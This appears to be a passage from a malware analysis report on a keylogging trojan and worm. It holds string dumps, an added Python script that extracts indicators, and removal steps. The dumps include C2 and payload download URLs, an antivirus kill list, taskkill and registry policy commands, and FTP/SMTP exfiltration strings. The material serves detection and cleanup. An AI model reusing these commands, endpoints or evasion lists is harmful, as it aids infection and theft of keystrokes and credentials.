REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
\skype.exe
Project1.exe
\1.txt
\2.txt
Project1xp.exe

Svchost.exe_1632_rwx_00400000_00063000:

(string dump of this RWX region is identical to the Svchost.exe_1632 dump above and is not repeated)

Svchost.exe_1456:

`.rsrc
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
urlmon
URLDownloadToFileA
shlwapi.dll
wininet.dll
GetKeyState
GetAsyncKeyState
shell32.dll
ShellExecuteA
kernel32.dll
ntdll.dll
FindExecutableA
WSOCK32.DLL
advapi32.dll
RegOpenKeyExA
RegCloseKey
user32.dll
FtpPutFileA
FtpSetCurrentDirectoryA
SetWindowsHookExA
UnhookWindowsHookEx
PassWord
C:\Windows\SysWow64\Msvbvm60.dll\3
msvbvm60.dll
FC:\Windows\SysWOW64\stdole2.tlb
VBA6.DLL
SSSh8o@
0||||1|1|hXXp://gonjeh.com/gate.php|0|||0||||||||10|0|PA
.text
`.data
.rsrc
hXXp://
gonjeh.com
~.php|#' 0
KERNEL32.DLL
MSVBVM60.DLL
@.OBJ
Microsoft.XmlHttp
application/x-www-form-urlencoded
Firefox 31
} [Keylogger]
ekrn.exe
avastsvc.exe
mbamgui.exe
GDSC.exe
iface.exe
MsMpeng.exe
cfp.exe
avguard.exe
uiSeAgnt.exe
NAV.exe
bdagent.exe
avgui.exe
AdAwareDesktop.exe
op_mon.exe
McSvHost.exe
avp.exe
hXXps://VVV.dropbox.com/s/8qzebad4j8c8igb/plugin.exe?dl=1
\12345.exe
\12345.txt
\System32\svchost.exe
WinHttp.WinHttpRequest.5.1
firefox
chrome
opera
hXXp://schemas.microsoft.com/cdo/configuration/smtpserver
hXXp://schemas.microsoft.com/cdo/configuration/sendusing
hXXp://schemas.microsoft.com/cdo/configuration/smtpserverport
hXXp://schemas.microsoft.com/cdo/
configuration/smtpauthenticate
hXXp://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout
hXXp://schemas.microsoft.com/cdo/configuration/sendusername
WScript.Shell
hXXp://schemas.microsoft.com/cdo/configuration/sendpassword
hXXp://schemas.microsoft.com/cdo/configuration/smtpusessl
Scripting.FileSystemObject
shell32.dll, 2
shell32.dll, 3
.fldr
shell32.dll, 0
\explorer.exe
wscript.Shell
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
{WINDOWS}
CDO.Message
o en el password (Spanish fragment: "or in the password")
stb.exe

Svchost.exe_1456_rwx_00400000_00024000:

(string dump of this RWX region is identical to the Svchost.exe_1456 dump above and is not repeated)
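Turning dumps like the ones above into indicators is mostly mechanical, and doing it by hand loses the defanged URLs and the field lists hidden in the pipe-delimited settings strings. The script below is an added example, not part of the Lavasoft report: DUMP_EXCERPT is a constructed excerpt made of lines copied from the Svchost.exe dumps above, and the refang() convention (hXXp to http, VVV. to www.) is this script's own, mirroring how the report defangs URLs.

```python
"""Pull indicators out of a process string dump such as the ones in this report.

Added example, not part of the Lavasoft report. DUMP_EXCERPT is a constructed
excerpt of lines copied from the report's Svchost.exe dumps.
"""
import re

DUMP_EXCERPT = """\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
cmd /c taskkill /F /pid
REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoRun
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
hXXp://VVV.host.com/path/yourfile.exe|1|6199Microsoft Error|Microsoft Error|32|6199PcCtWRS.exe|EqEhol.txt|RYWNaI.exe|QjlCDo|
0||||1|1|hXXp://gonjeh.com/gate.php|0|||0||||||||10|0|PA
hXXps://VVV.dropbox.com/s/8qzebad4j8c8igb/plugin.exe?dl=1
SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\%s
""".splitlines()

URL_RE = re.compile(r'h(?:xx|tt)ps?://[^\s|<>"]+', re.IGNORECASE)
FILE_RE = re.compile(r"[\w-]+\.(?:exe|dll|txt)\b", re.IGNORECASE)
PERSIST_RE = re.compile(
    r"\\CurrentVersion\\Run\\|Active Setup\\Installed Components|schtasks\s+/create",
    re.IGNORECASE)
# Built-in tools the bot shells out to (kill AV, lock files, policy tweaks).
LOLBIN_RE = re.compile(r"^(?:cmd|schtasks|taskkill|icacls|reg|wscript)\b", re.IGNORECASE)


def refang(url):
    """hXXp://VVV.example -> http://www.example (undo the report's defanging)."""
    url = re.sub(r"^hxx(ps?://)", r"htt\1", url, flags=re.IGNORECASE)
    return re.sub(r"://VVV\.", "://www.", url)


def parse_pipe_config(line):
    """Split a builder/crypter settings blob into its non-empty fields."""
    return [field for field in line.split("|") if field]


def extract_iocs(lines):
    out = {"urls": set(), "persistence": [], "commands": [],
           "form_grab_targets": [], "config_fields": []}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        for m in URL_RE.finditer(line):
            out["urls"].add(refang(m.group(0)))
        if PERSIST_RE.search(line):
            out["persistence"].append(line)
        if LOLBIN_RE.match(line):
            out["commands"].append(line)
        # Form-grabber targets are wildcard URL patterns around a login page.
        if line.startswith("*") and "login" in line.lower():
            out["form_grab_targets"].append(line)
        # Five or more pipes in one string is a settings blob, not prose.
        if line.count("|") >= 5:
            out["config_fields"].extend(parse_pipe_config(line))
    # File names named in the settings blob are the drop names to hunt for;
    # the dump may fuse a length prefix onto the first one (e.g. "6199PcCtWRS.exe").
    out["config_files"] = sorted({m.group(0) for field in out["config_fields"]
                                  for m in FILE_RE.finditer(field)})
    return out


if __name__ == "__main__":
    for key, value in extract_iocs(DUMP_EXCERPT).items():
        print(key, "->", value)
```

The settings blobs are worth the extra handling: the first one lists exactly the file names the sample wrote to %Temp% (cCtWRS.exe, EqEhol.txt, QjlCDo) and the second carries the gate URL on the same host that served drop.exe, so the dump ties the file activity, the traffic and the C2 together without running anything.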


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    cCtWRS.exe:1936
    lssis.exe:492
    SdJshk.exe:1584
    %original file name%.exe:1772
    Svchost.exe:336, Svchost.exe:1924, Svchost.exe:1632, Svchost.exe:1456 (the dropped copies running from %Documents and Settings%\%current user%\Local Settings\Temp, not %SystemRoot%\System32\svchost.exe)

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut7.tmp (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TsTEFE.txt (3651 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fLBYTh (2161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (3057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut5.tmp (3057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\SdJshk.exe (10322 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut6.tmp (2145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\QjlCDo (2161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EqEhol.txt (27193 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (3057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cCtWRS.exe (5161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (9845 bytes)

    together with the dropped PE files this list omits (see Dropped PE files above):

    %Documents and Settings%\%current user%\Application Data\qjlcdo\cCtWRS.exe
    %Documents and Settings%\%current user%\Local Settings\Temp\explorer.exe
    %Documents and Settings%\%current user%\Local Settings\Temp\lssis.exe
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SQ1JWKKG\drop[1].exe

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Check the persistence locations named in the string dumps and remove any entry pointing at the files above: the Run keys under HKCU and HKLM\Software\Microsoft\Windows\CurrentVersion\Run, SOFTWARE\Microsoft\Active Setup\Installed Components, and a scheduled task named WindowsUpdate (schtasks /delete /tn WindowsUpdate). The sandbox log above did not record these writes, so verify rather than assume.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
